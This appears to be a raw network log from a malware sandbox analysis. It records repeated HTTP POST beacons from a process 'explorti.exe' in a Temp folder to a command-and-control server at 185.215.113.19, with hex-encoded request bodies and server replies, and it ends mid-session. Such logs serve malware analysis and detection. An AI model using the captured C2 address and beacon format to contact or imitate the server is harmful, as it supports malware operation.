Sep 1, 2024 06:29:31.051265955 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:31.821625948 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.5	49838	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:32.287226915 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:33.746697903 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:29:33.746712923 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:29:33.746721029 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:29:33.994553089 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.5	49839	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:34.246123075 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:35.027827024 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.5	49840	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:35.149516106 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:35.912060976 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.5	49841	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:35.921111107 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:36.698991060 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.5	49842	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:36.818028927 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:37.605518103 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.5	49843	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:37.617441893 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.5	49844	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:37.947256088 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:38.716128111 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.5	49845	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:38.728828907 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:39.476171970 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.5	49846	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:39.599703074 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:40.346975088 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.5	49847	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:40.358844995 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:41.123135090 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.5	49848	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:41.395239115 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:42.137677908 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.5	49849	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:42.147325993 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:42.893543959 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.5	49850	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:43.004832029 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:43.779803038 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.5	49851	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:43.789258003 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:44.556024075 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.5	49852	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:44.688565016 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:45.430222988 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.5	49853	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:45.439825058 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:46.184551954 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.5	49854	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:46.362407923 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:47.101752996 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.5	49855	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:47.111217976 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:47.854269981 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.5	49856	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:47.975831985 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:48.746891022 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.5	49857	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:48.755177975 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:49.560703039 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.5	49858	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:49.681036949 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:50.448950052 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.5	49859	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
